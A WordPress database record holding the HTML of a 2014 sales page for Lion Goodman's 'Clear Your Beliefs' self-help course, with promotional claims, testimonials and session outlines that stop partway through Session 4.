(918, 4194, '2014-06-17 21:57:35', '2014-06-18 02:57:35', '<div style="width: 115%; margin-left: -40px;">\n\n<img class="hdr-img alignleft wp-image-300" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations</strong></h5>\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy</strong></h5>\n<img class="tophdr alignleft wp-image-316" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\n</div>\n<div class="quot" style="float: left; margin-top: 0px; margin-left: 40px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong></span>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\n&nbsp;\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\n\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\n\n&nbsp;\n<h1>What If You Could Permanently Delete Old Habits And Patterns So They <em>Didn''t</em> Come Back?</h1>\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\n\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n\n&nbsp;\n<h1>Why Does This Happen?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\n\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\n\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\n\n&nbsp;\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\n\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\n\n&nbsp;\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\n\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\n\n&nbsp;\n<h1>Upgrade Your Human Operating System</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\n\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\n<div class="icon_box bullets">\n<ul class="two-col">\n	<li><strong><em>I''m not enough.</em></strong></li>\n	<li><strong><em>I can''t do it.</em></strong></li>\n	<li><strong><em>I''m not worthy.</em></strong></li>\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\n	<li><strong><em>I''m all alone.</em></strong></li>\n</ul>\n<ul class="two-col rt">\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\n</ul>\n</div>\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\n\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\n\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\n\n&nbsp;\n<h1>The Garden Of Your Mind</h1>\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\n&nbsp;\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\n\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\n\n&nbsp;\n\n&nbsp;\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\n\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\n\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\n\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\n\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\n\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\n\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\n\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\n\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\n<ul class="indented-img-left">\n	<li>Why did I say that?</li>\n	<li>What’s wrong with me?</li>\n	<li>Why didn’t I follow through?</li>\n	<li>Why did I react that way?</li>\n	<li>What the hell just happened?</li>\n</ul>\n<em>\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\n\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\n\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\n<ul class="indented">\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\n</ul>\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\n\n&nbsp;\n<h1>Here’s Some Good News</h1>\n<ul class="indented">\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\n</ul>\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\n\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\n\n&nbsp;\n<h1>Imagine The Life You Desire</h1>\n<strong>Can you imagine this?</strong>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n<ul class="indented-img-left">\n	<li>You''re no longer held back by old beliefs and stories.</li>\n	<li>There''s no resistance to doing what needs to be done.</li>\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\n</ul>\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\n\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\n\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\n\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\n\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All For What Ails You?</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work. No technique will cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. No free rides.\n\nIn our ten years of experience using this technique with thousands of clients, we''ve seen that nearly every problem has its source at the causal causal level, down where your beliefs are stored. Itt takes significant effort to clear your deepest beliefs – the ones that got programmed before you could speak.\n\nThat''s why we offer a <strong>Coaching Option</strong> with our program. Our professionally trained <em>Clear Your Beliefs Coaches</em> can guide you on your journey down to the deepest level of your psyche – a place that''s difficult to get to all by yourself.\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n<ul class="indented">\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\n</ul>\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\n\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\n\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\n<div class="icon_box">\n<h1>With This Methodology, You Can Finally:</h1>\n<ul class="check">\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\n	<li>Remove resistance and barriers</li>\n	<li>Open doors to new opportunities</li>\n	<li>Eliminate pain and suffering from the past</li>\n	<li>Experience more fulfillment in your relationships</li>\n	<li>Attract more abundance and prosperity</li>\n	<li>Increase your energy, vitality, and productivity</li>\n</ul>\n</div>\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\n<div class="quot">\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n</div>\n<div class="message_box">\n<h1>A Message from Lion Goodman...</h1>\nDear Explorer:\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\n\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\n\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\n\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\n\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\n\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\n\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\n\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\n\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\n\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\n\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\n\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\n\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\n\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\n\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\n\n</div>\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\n\nYou can take yourself through the course, or you can go deeper by working one-on-one with a <em>Clear Your Beliefs Coach, </em>who will guide you and answer your questions each week. Our professionally trained coaches are located in cities around the world, and they can work with you in person, by phone, or via Skype.\n\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\n\n</div>\n<div class="module_body">\n\n<strong> In Session 1, you will:</strong>\n<ul>\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\n</ul>\n</div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 2, you will:</strong>\n<ul>\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\n</ul>\n</div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div style="text-align: right;"></div>\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\n\n</div>\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\n<div class="module_body"></div>\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 3, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\n</ul>\n</div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n</div>\n<div class="module_body">\n\n<a 